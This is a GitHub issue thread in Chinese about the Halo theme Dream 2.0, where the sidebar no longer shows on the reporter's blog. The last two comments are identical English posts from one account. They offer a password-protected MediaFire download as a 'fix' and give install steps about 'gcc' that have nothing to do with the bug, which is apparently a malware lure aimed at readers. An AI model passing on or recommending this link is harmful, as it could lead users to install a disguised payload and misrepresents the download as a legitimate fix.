### ISSUE TITLE
bug:侧边栏完全消失 

### ISSUE THREAD

**Issue by JackySuen1994** [nineya/halo-theme-dream2.0#152]
### 是什么 Halo 版本出现了此问题？

2.18.0

### 使用的 Dream 版本是多少？

1.3.2

### 在线博客地址

https://yyliucha.com/

### BUG 内容

![image](https://github.com/user-attachments/assets/4b8d3cc7-9cde-4fa2-80b1-5c0038c9233a)
![image](https://github.com/user-attachments/assets/62cb63cc-50bf-4598-a05a-182989e44524)
![image](https://github.com/user-attachments/assets/d12d96ea-f9ec-4b3e-b1be-92f1aa865a65)
![image](https://github.com/user-attachments/assets/b907bcb9-26a8-4bd8-a0e7-211e8e7af95e)

**Comment by JackySuen1994** [comment]
侧边栏是开启的,但是去访问页面的时候,侧边栏不显示
我留了博客地址,可以访问看下实际情况的

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
